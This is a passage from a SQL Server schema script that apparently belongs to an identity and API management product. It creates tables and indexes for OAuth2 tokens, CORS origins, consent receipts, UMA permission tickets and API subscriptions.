IDN_CONFIG_RESOURCE (ID) ON DELETE CASCADE ON UPDATE CASCADE;
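-- Remote fetch configuration tables --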
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_REMOTE_FETCH_CONFIG]') AND TYPE IN (N'U'))
CREATE TABLE IDN_REMOTE_FETCH_CONFIG (
ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
IS_ENABLED CHAR(1) NOT NULL,
REPO_MANAGER_TYPE VARCHAR(255) NOT NULL,
ACTION_LISTENER_TYPE VARCHAR(255) NOT NULL,
CONFIG_DEPLOYER_TYPE VARCHAR(255) NOT NULL,
REMOTE_FETCH_NAME VARCHAR(255),
REMOTE_RESOURCE_URI VARCHAR(255) NOT NULL,
ATTRIBUTES_JSON TEXT NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT UC_REMOTE_RESOURCE_TYPE UNIQUE (TENANT_ID, CONFIG_DEPLOYER_TYPE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_REMOTE_FETCH_REVISIONS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_REMOTE_FETCH_REVISIONS (
ID VARCHAR(255) NOT NULL,
CONFIG_ID VARCHAR(255) NOT NULL,
FILE_PATH VARCHAR(255) NOT NULL,
FILE_HASH VARCHAR(255),
DEPLOYED_DATE DATETIME,
LAST_SYNC_TIME DATETIME,
DEPLOYMENT_STATUS VARCHAR(255),
ITEM_NAME VARCHAR(255),
DEPLOY_ERR_LOG TEXT,
PRIMARY KEY (ID),
FOREIGN KEY (CONFIG_ID) REFERENCES IDN_REMOTE_FETCH_CONFIG(ID) ON DELETE CASCADE,
CONSTRAINT UC_REVISIONS UNIQUE (CONFIG_ID, ITEM_NAME)
);
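-- User functionality lock tables --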
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_USER_FUNCTIONALITY_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_USER_FUNCTIONALITY_MAPPING (
ID VARCHAR(255) NOT NULL,
USER_ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
FUNCTIONALITY_ID VARCHAR(255) NOT NULL,
IS_FUNCTIONALITY_LOCKED BIT NOT NULL,
FUNCTIONALITY_UNLOCK_TIME BIGINT NOT NULL,
FUNCTIONALITY_LOCK_REASON VARCHAR(1023),
FUNCTIONALITY_LOCK_REASON_CODE VARCHAR(255),
PRIMARY KEY (ID),
CONSTRAINT IDN_USER_FUNCTIONALITY_MAPPING_CONSTRAINT UNIQUE (TENANT_ID, USER_ID, FUNCTIONALITY_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_USER_FUNCTIONALITY_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_USER_FUNCTIONALITY_PROPERTY (
ID VARCHAR(255) NOT NULL,
USER_ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
FUNCTIONALITY_ID VARCHAR(255) NOT NULL,
PROPERTY_NAME VARCHAR(255),
PROPERTY_VALUE VARCHAR(255),
PRIMARY KEY (ID),
CONSTRAINT IDN_USER_FUNCTIONALITY_PROPERTY_CONSTRAINT UNIQUE (USER_ID, TENANT_ID, FUNCTIONALITY_ID, PROPERTY_NAME)
);
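-- CORS management tables --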
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CORS_ORIGIN]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CORS_ORIGIN (
ID INT NOT NULL IDENTITY,
TENANT_ID INT NOT NULL,
ORIGIN VARCHAR(2048) NOT NULL,
UUID CHAR(36) NOT NULL,
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, ORIGIN),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CORS_ASSOCIATION]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CORS_ASSOCIATION (
IDN_CORS_ORIGIN_ID INT NOT NULL,
SP_APP_ID INT NOT NULL,
PRIMARY KEY (IDN_CORS_ORIGIN_ID, SP_APP_ID),
FOREIGN KEY (IDN_CORS_ORIGIN_ID) REFERENCES IDN_CORS_ORIGIN (ID) ON DELETE CASCADE,
FOREIGN KEY (SP_APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
-- --------------------------- INDEX CREATION -----------------------------
-- IDN_OAUTH2_ACCESS_TOKEN --
CREATE INDEX IDX_TC ON IDN_OAUTH2_ACCESS_TOKEN(TIME_CREATED);
CREATE INDEX IDX_ATH ON IDN_OAUTH2_ACCESS_TOKEN(ACCESS_TOKEN_HASH);
CREATE INDEX IDX_AT_CK_AU ON IDN_OAUTH2_ACCESS_TOKEN(CONSUMER_KEY_ID, AUTHZ_USER, TOKEN_STATE, USER_TYPE);
CREATE INDEX IDX_AT_TI_UD ON IDN_OAUTH2_ACCESS_TOKEN(AUTHZ_USER, TENANT_ID, TOKEN_STATE, USER_DOMAIN);
CREATE INDEX IDX_AT_AU_TID_UD_TS_CKID ON IDN_OAUTH2_ACCESS_TOKEN(AUTHZ_USER, TENANT_ID, USER_DOMAIN, TOKEN_STATE, CONSUMER_KEY_ID);
CREATE INDEX IDX_AT_AT ON IDN_OAUTH2_ACCESS_TOKEN (AUTHZ_USER) INCLUDE (ACCESS_TOKEN);
CREATE INDEX IDX_AT_AU_CKID_TS_UT ON IDN_OAUTH2_ACCESS_TOKEN(AUTHZ_USER, CONSUMER_KEY_ID, TOKEN_STATE, USER_TYPE);
CREATE INDEX IDX_AT_RTH ON IDN_OAUTH2_ACCESS_TOKEN(REFRESH_TOKEN_HASH);
CREATE INDEX IDX_AT_RT ON IDN_OAUTH2_ACCESS_TOKEN (AUTHZ_USER) INCLUDE (REFRESH_TOKEN);
CREATE INDEX IDX_AT_CKID_AU_TID_UD_TSH_TS ON IDN_OAUTH2_ACCESS_TOKEN(CONSUMER_KEY_ID, AUTHZ_USER, TENANT_ID, USER_DOMAIN, TOKEN_SCOPE_HASH, TOKEN_STATE);
-- IDN_OAUTH2_AUTHORIZATION_CODE --
CREATE INDEX IDX_AUTHORIZATION_CODE_HASH ON IDN_OAUTH2_AUTHORIZATION_CODE (AUTHORIZATION_CODE_HASH, CONSUMER_KEY_ID);
CREATE INDEX IDX_AUTHORIZATION_CODE_AU_TI ON IDN_OAUTH2_AUTHORIZATION_CODE (AUTHZ_USER, TENANT_ID, USER_DOMAIN, STATE);
CREATE INDEX IDX_AC_CKID ON IDN_OAUTH2_AUTHORIZATION_CODE(CONSUMER_KEY_ID);
CREATE INDEX IDX_AC_TID ON IDN_OAUTH2_AUTHORIZATION_CODE(TOKEN_ID);
CREATE INDEX IDX_AC_AC_CKID ON IDN_OAUTH2_AUTHORIZATION_CODE (AUTHZ_USER) INCLUDE (AUTHORIZATION_CODE, CONSUMER_KEY_ID);
-- IDN_SCIM_GROUP --
CREATE INDEX IDX_IDN_SCIM_GROUP_TI_RN ON IDN_SCIM_GROUP (TENANT_ID, ROLE_NAME);
CREATE INDEX IDX_IDN_SCIM_GROUP_TI_RN_AN ON IDN_SCIM_GROUP (TENANT_ID, ROLE_NAME, ATTR_NAME);
-- IDN_AUTH_SESSION_STORE --
CREATE INDEX IDX_IDN_AUTH_SESSION_TIME ON IDN_AUTH_SESSION_STORE (TIME_CREATED);
-- IDN_AUTH_TEMP_SESSION_STORE --
CREATE INDEX IDX_IDN_AUTH_TMP_SESSION_TIME ON IDN_AUTH_TEMP_SESSION_STORE (TIME_CREATED);
-- IDN_OIDC_SCOPE_CLAIM_MAPPING --
CREATE INDEX IDX_AT_SI_ECI ON IDN_OIDC_SCOPE_CLAIM_MAPPING(SCOPE_ID, EXTERNAL_CLAIM_ID);
-- IDN_OAUTH2_SCOPE --
CREATE INDEX IDX_SC_TID ON IDN_OAUTH2_SCOPE(TENANT_ID);
-- IDN_OAUTH2_SCOPE_BINDING --
CREATE INDEX IDX_SB_SCPID ON IDN_OAUTH2_SCOPE_BINDING(SCOPE_ID);
-- IDN_OIDC_REQ_OBJECT_REFERENCE --
CREATE INDEX IDX_OROR_TID ON IDN_OIDC_REQ_OBJECT_REFERENCE(TOKEN_ID);
-- IDN_OAUTH2_ACCESS_TOKEN_SCOPE --
CREATE INDEX IDX_ATS_TID ON IDN_OAUTH2_ACCESS_TOKEN_SCOPE(TOKEN_ID);
-- SP_TEMPLATE --
CREATE INDEX IDX_SP_TEMPLATE ON SP_TEMPLATE (TENANT_ID, NAME);
-- IDN_AUTH_USER --
CREATE INDEX IDX_AUTH_USER_UN_TID_DN ON IDN_AUTH_USER (USER_NAME, TENANT_ID, DOMAIN_NAME);
CREATE INDEX IDX_AUTH_USER_DN_TOD ON IDN_AUTH_USER (DOMAIN_NAME, TENANT_ID);
-- IDN_AUTH_USER_SESSION_MAPPING --
CREATE INDEX IDX_USER_ID ON IDN_AUTH_USER_SESSION_MAPPING (USER_ID);
CREATE INDEX IDX_SESSION_ID ON IDN_AUTH_USER_SESSION_MAPPING (SESSION_ID);
-- IDN_OAUTH_CONSUMER_APPS --
CREATE INDEX IDX_OCA_UM_TID_UD_APN ON IDN_OAUTH_CONSUMER_APPS(USERNAME,TENANT_ID,USER_DOMAIN, APP_NAME);
-- SP_INBOUND_AUTH --
CREATE INDEX IDX_SPI_APP ON SP_INBOUND_AUTH(APP_ID);
-- IDN_OIDC_PROPERTY --
CREATE INDEX IDX_IOP_TID_CK ON IDN_OIDC_PROPERTY(TENANT_ID,CONSUMER_KEY);
-- FIDO2_DEVICE_STORE --
CREATE INDEX IDX_FIDO2_STR ON FIDO2_DEVICE_STORE(USER_NAME, TENANT_ID, DOMAIN_NAME, CREDENTIAL_ID, USER_HANDLE);
-- IDN_ASSOCIATED_ID --
CREATE INDEX IDX_AI_DN_UN_AI ON IDN_ASSOCIATED_ID(DOMAIN_NAME, USER_NAME, ASSOCIATION_ID);
-- IDN_OAUTH2_TOKEN_BINDING --
CREATE INDEX IDX_IDN_AUTH_BIND ON IDN_OAUTH2_TOKEN_BINDING (TOKEN_BINDING_REF);
-- IDN_FED_AUTH_SESSION_MAPPING --
CREATE INDEX IDX_FEDERATED_AUTH_SESSION_ID ON IDN_FED_AUTH_SESSION_MAPPING (SESSION_ID);
-- IDN_REMOTE_FETCH_REVISIONS --
CREATE INDEX IDX_REMOTE_FETCH_REVISION_CONFIG_ID ON IDN_REMOTE_FETCH_REVISIONS (CONFIG_ID);
-- IDN_CORS_ASSOCIATION --
CREATE INDEX IDX_CORS_SP_APP_ID ON IDN_CORS_ASSOCIATION (SP_APP_ID);
CREATE INDEX IDX_CORS_ORIGIN_ID ON IDN_CORS_ASSOCIATION (IDN_CORS_ORIGIN_ID);
-- Start of CONSENT-MGT Tables --
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PII_CATEGORY]') AND TYPE IN (N'U'))
CREATE TABLE CM_PII_CATEGORY (
ID INTEGER NOT NULL IDENTITY,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
DISPLAY_NAME VARCHAR(255),
IS_SENSITIVE INTEGER NOT NULL,
TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_PII_CATEGORY_CNT UNIQUE (NAME, TENANT_ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_RECEIPT]') AND TYPE IN (N'U'))
CREATE TABLE CM_RECEIPT (
CONSENT_RECEIPT_ID VARCHAR(255) NOT NULL,
VERSION VARCHAR(255) NOT NULL,
JURISDICTION VARCHAR(255) NOT NULL,
CONSENT_TIMESTAMP DATETIME NOT NULL,
COLLECTION_METHOD VARCHAR(255) NOT NULL,
LANGUAGE VARCHAR(255) NOT NULL,
PII_PRINCIPAL_ID VARCHAR(255) NOT NULL,
PRINCIPAL_TENANT_ID INTEGER DEFAULT '-1234',
POLICY_URL VARCHAR(255) NOT NULL,
STATE VARCHAR(255) NOT NULL,
PII_CONTROLLER VARCHAR(2048) NOT NULL,
PRIMARY KEY (CONSENT_RECEIPT_ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PURPOSE]') AND TYPE IN (N'U'))
CREATE TABLE CM_PURPOSE (
ID INTEGER NOT NULL IDENTITY,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
PURPOSE_GROUP VARCHAR(255) NOT NULL,
GROUP_TYPE VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_PURPOSE_CNT UNIQUE (NAME, TENANT_ID, PURPOSE_GROUP, GROUP_TYPE),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PURPOSE_CATEGORY]') AND TYPE IN (N'U'))
CREATE TABLE CM_PURPOSE_CATEGORY (
ID INTEGER NOT NULL IDENTITY,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_PURPOSE_CATEGORY_CNT UNIQUE (NAME, TENANT_ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_RECEIPT_SP_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_RECEIPT_SP_ASSOC (
ID INTEGER NOT NULL IDENTITY,
CONSENT_RECEIPT_ID VARCHAR(255) NOT NULL,
SP_NAME VARCHAR(255) NOT NULL,
SP_DISPLAY_NAME VARCHAR(255),
SP_DESCRIPTION VARCHAR(255),
SP_TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_RECEIPT_SP_ASSOC_CNT UNIQUE (CONSENT_RECEIPT_ID, SP_NAME, SP_TENANT_ID),
FOREIGN KEY (CONSENT_RECEIPT_ID) REFERENCES CM_RECEIPT (CONSENT_RECEIPT_ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_SP_PURPOSE_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_SP_PURPOSE_ASSOC (
ID INTEGER NOT NULL IDENTITY,
RECEIPT_SP_ASSOC INTEGER NOT NULL,
PURPOSE_ID INTEGER NOT NULL,
CONSENT_TYPE VARCHAR(255) NOT NULL,
IS_PRIMARY_PURPOSE INTEGER NOT NULL,
TERMINATION VARCHAR(255) NOT NULL,
THIRD_PARTY_DISCLOSURE INTEGER NOT NULL,
THIRD_PARTY_NAME VARCHAR(255),
CONSTRAINT CM_SP_PURPOSE_ASSOC_CNT UNIQUE (RECEIPT_SP_ASSOC, PURPOSE_ID),
FOREIGN KEY (RECEIPT_SP_ASSOC) REFERENCES CM_RECEIPT_SP_ASSOC (ID),
FOREIGN KEY (PURPOSE_ID) REFERENCES CM_PURPOSE (ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_SP_PURPOSE_PURPOSE_CAT_ASSC]') AND TYPE IN (N'U'))
CREATE TABLE CM_SP_PURPOSE_PURPOSE_CAT_ASSC (
SP_PURPOSE_ASSOC_ID INTEGER NOT NULL,
PURPOSE_CATEGORY_ID INTEGER NOT NULL,
CONSTRAINT CM_SP_PURPOSE_PURPOSE_CAT_ASSC_CNT UNIQUE (SP_PURPOSE_ASSOC_ID, PURPOSE_CATEGORY_ID),
FOREIGN KEY (SP_PURPOSE_ASSOC_ID) REFERENCES CM_SP_PURPOSE_ASSOC (ID),
FOREIGN KEY (PURPOSE_CATEGORY_ID) REFERENCES CM_PURPOSE_CATEGORY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PURPOSE_PII_CAT_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_PURPOSE_PII_CAT_ASSOC (
PURPOSE_ID INTEGER NOT NULL,
CM_PII_CATEGORY_ID INTEGER NOT NULL,
IS_MANDATORY INTEGER NOT NULL,
CONSTRAINT CM_PURPOSE_PII_CAT_ASSOC_CNT UNIQUE (PURPOSE_ID, CM_PII_CATEGORY_ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_SP_PURPOSE_PII_CAT_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_SP_PURPOSE_PII_CAT_ASSOC (
SP_PURPOSE_ASSOC_ID INTEGER NOT NULL,
PII_CATEGORY_ID INTEGER NOT NULL,
VALIDITY VARCHAR(1023),
CONSTRAINT CM_SP_PURPOSE_PII_CAT_ASSOC_CNT UNIQUE (SP_PURPOSE_ASSOC_ID, PII_CATEGORY_ID),
FOREIGN KEY (PII_CATEGORY_ID) REFERENCES CM_PII_CATEGORY (ID),
FOREIGN KEY (SP_PURPOSE_ASSOC_ID) REFERENCES CM_SP_PURPOSE_ASSOC (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_CONSENT_RECEIPT_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE CM_CONSENT_RECEIPT_PROPERTY (
CONSENT_RECEIPT_ID VARCHAR(255) NOT NULL,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(1023) NOT NULL,
CONSTRAINT CM_CONSENT_RECEIPT_PROPERTY_CNT UNIQUE (CONSENT_RECEIPT_ID, NAME),
FOREIGN KEY (CONSENT_RECEIPT_ID) REFERENCES CM_RECEIPT (CONSENT_RECEIPT_ID)
);
INSERT INTO CM_PURPOSE (NAME, DESCRIPTION, PURPOSE_GROUP, GROUP_TYPE, TENANT_ID) VALUES ('DEFAULT', 'For core functionalities of the product', 'DEFAULT', 'SP', '-1234');
INSERT INTO CM_PURPOSE_CATEGORY (NAME, DESCRIPTION, TENANT_ID) VALUES ('DEFAULT','For core functionalities of the product', '-1234');
-- End of CONSENT-MGT Tables --
-- UMA tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_RESOURCE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_RESOURCE (
ID INTEGER IDENTITY NOT NULL,
RESOURCE_ID VARCHAR(255),
RESOURCE_NAME VARCHAR(255),
TIME_CREATED DATETIME NOT NULL,
RESOURCE_OWNER_NAME VARCHAR(255),
CLIENT_ID VARCHAR(255),
TENANT_ID INTEGER DEFAULT -1234,
USER_DOMAIN VARCHAR(50),
PRIMARY KEY (ID)
);
CREATE INDEX IDX_RID ON IDN_UMA_RESOURCE (RESOURCE_ID);
CREATE INDEX IDX_USER ON IDN_UMA_RESOURCE (RESOURCE_OWNER_NAME, USER_DOMAIN);
CREATE INDEX IDX_USER_RID ON IDN_UMA_RESOURCE (RESOURCE_ID, RESOURCE_OWNER_NAME, USER_DOMAIN, CLIENT_ID);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_RESOURCE_META_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_RESOURCE_META_DATA (
ID INTEGER IDENTITY NOT NULL,
RESOURCE_IDENTITY INTEGER NOT NULL,
PROPERTY_KEY VARCHAR(40),
PROPERTY_VALUE VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (RESOURCE_IDENTITY) REFERENCES IDN_UMA_RESOURCE (ID) ON DELETE CASCADE
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_RESOURCE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_RESOURCE_SCOPE (
ID INTEGER IDENTITY NOT NULL,
RESOURCE_IDENTITY INTEGER NOT NULL,
SCOPE_NAME VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (RESOURCE_IDENTITY) REFERENCES IDN_UMA_RESOURCE (ID) ON DELETE CASCADE
);
CREATE INDEX IDX_RS ON IDN_UMA_RESOURCE_SCOPE (SCOPE_NAME);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_PERMISSION_TICKET]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_PERMISSION_TICKET (
ID INTEGER IDENTITY NOT NULL,
PT VARCHAR(255) NOT NULL,
TIME_CREATED DATETIME NOT NULL,
EXPIRY_TIME DATETIME NOT NULL,
TICKET_STATE VARCHAR(25) DEFAULT 'ACTIVE',
TENANT_ID INTEGER DEFAULT -1234,
TOKEN_ID VARCHAR(255),
PRIMARY KEY (ID)
);
CREATE INDEX IDX_PT ON IDN_UMA_PERMISSION_TICKET (PT);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_PT_RESOURCE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_PT_RESOURCE (
ID INTEGER IDENTITY NOT NULL,
PT_RESOURCE_ID INTEGER NOT NULL,
PT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (PT_ID) REFERENCES IDN_UMA_PERMISSION_TICKET (ID) ON DELETE CASCADE,
FOREIGN KEY (PT_RESOURCE_ID) REFERENCES IDN_UMA_RESOURCE (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_PT_RESOURCE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_PT_RESOURCE_SCOPE (
ID INTEGER IDENTITY NOT NULL,
PT_RESOURCE_ID INTEGER NOT NULL,
PT_SCOPE_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (PT_RESOURCE_ID) REFERENCES IDN_UMA_PT_RESOURCE (ID) ON DELETE CASCADE,
FOREIGN KEY (PT_SCOPE_ID) REFERENCES IDN_UMA_RESOURCE_SCOPE (ID)
);
-- Start of API-Mgt Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SUBSCRIBER]') AND TYPE IN (N'U'))
CREATE TABLE AM_SUBSCRIBER (
SUBSCRIBER_ID INTEGER IDENTITY(1,1),
USER_ID VARCHAR(50) NOT NULL,
TENANT_ID INTEGER NOT NULL,
EMAIL_ADDRESS VARCHAR(256) NULL,
DATE_SUBSCRIBED DATETIME NOT NULL,
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
PRIMARY KEY (SUBSCRIBER_ID),
UNIQUE (TENANT_ID,USER_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION (
APPLICATION_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(100) COLLATE Latin1_General_CS_AS,
SUBSCRIBER_ID INTEGER,
APPLICATION_TIER VARCHAR(50) DEFAULT 'Unlimited',
CALLBACK_URL VARCHAR(512),
DESCRIPTION VARCHAR(512),
APPLICATION_STATUS VARCHAR(50) DEFAULT 'APPROVED',
GROUP_ID VARCHAR(100),
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
UUID VARCHAR(256),
TOKEN_TYPE VARCHAR(10),
FOREIGN KEY(SUBSCRIBER_ID) REFERENCES AM_SUBSCRIBER(SUBSCRIBER_ID) ON UPDATE CASCADE,
PRIMARY KEY(APPLICATION_ID),
UNIQUE (NAME,SUBSCRIBER_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_MONETIZATION_USAGE]') AND TYPE IN (N'U'))
CREATE TABLE AM_MONETIZATION_USAGE (
ID VARCHAR(100) NOT NULL,
STATE VARCHAR(50) NOT NULL,
STATUS VARCHAR(50) NOT NULL,
STARTED_TIME VARCHAR(50) NOT NULL,
PUBLISHED_TIME VARCHAR(50) NOT NULL,
PRIMARY KEY(ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API]') AND TYPE IN (N'U'))
CREATE TABLE AM_API (
API_ID INTEGER IDENTITY(1,1),
API_UUID VARCHAR(256),
API_PROVIDER VARCHAR(200),
API_NAME VARCHAR(200),
API_VERSION VARCHAR(30),
CONTEXT VARCHAR(256),
CONTEXT_TEMPLATE VARCHAR(256),
API_TIER VARCHAR(256),
API_TYPE VARCHAR(10),
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
STATUS VARCHAR(30),
PRIMARY KEY(API_ID),
UNIQUE (API_PROVIDER,API_NAME,API_VERSION),
UNIQUE (API_UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GRAPHQL_COMPLEXITY]') AND TYPE IN (N'U'))
CREATE TABLE AM_GRAPHQL_COMPLEXITY (
UUID VARCHAR(256),
API_ID INTEGER NOT NULL,
TYPE VARCHAR(256),
FIELD VARCHAR(256),
COMPLEXITY_VALUE INTEGER,
REVISION_UUID VARCHAR(255),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE ON DELETE CASCADE,
PRIMARY KEY(UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_URL_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_URL_MAPPING (
URL_MAPPING_ID INTEGER IDENTITY(1,1),
API_ID INTEGER NOT NULL,
HTTP_METHOD VARCHAR(20) NULL,
AUTH_SCHEME VARCHAR(50) NULL,
URL_PATTERN VARCHAR(512) NULL,
THROTTLING_TIER VARCHAR(512) DEFAULT NULL,
MEDIATION_SCRIPT VARBINARY(MAX),
REVISION_UUID VARCHAR(255),
PRIMARY KEY (URL_MAPPING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_RESOURCE_SCOPE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_RESOURCE_SCOPE_MAPPING (
SCOPE_NAME VARCHAR(255) NOT NULL,
URL_MAPPING_ID INTEGER NOT NULL,
TENANT_ID INTEGER NOT NULL,
FOREIGN KEY (URL_MAPPING_ID) REFERENCES AM_API_URL_MAPPING(URL_MAPPING_ID) ON DELETE CASCADE,
PRIMARY KEY(SCOPE_NAME, URL_MAPPING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SECURITY_AUDIT_UUID_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_SECURITY_AUDIT_UUID_MAPPING (
API_ID INTEGER NOT NULL,
AUDIT_UUID VARCHAR(255) NOT NULL,
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE ON DELETE NO ACTION,
PRIMARY KEY (API_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_PRODUCT_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_PRODUCT_MAPPING (
API_PRODUCT_MAPPING_ID INTEGER IDENTITY(1,1),
API_ID INTEGER,
URL_MAPPING_ID INTEGER,
REVISION_UUID VARCHAR(255),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE,
FOREIGN KEY (URL_MAPPING_ID) REFERENCES AM_API_URL_MAPPING(URL_MAPPING_ID) ON DELETE CASCADE,
PRIMARY KEY(API_PRODUCT_MAPPING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_SUBSCRIPTION (
SUBSCRIPTION_ID INTEGER IDENTITY(1,1),
TIER_ID VARCHAR(50),
TIER_ID_PENDING VARCHAR(50),
API_ID INTEGER,
LAST_ACCESSED DATETIME NULL,
APPLICATION_ID INTEGER,
SUB_STATUS VARCHAR(50),
SUBS_CREATE_STATE VARCHAR(50) DEFAULT 'SUBSCRIBE',
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
UUID VARCHAR(256),
FOREIGN KEY(APPLICATION_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON UPDATE CASCADE,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
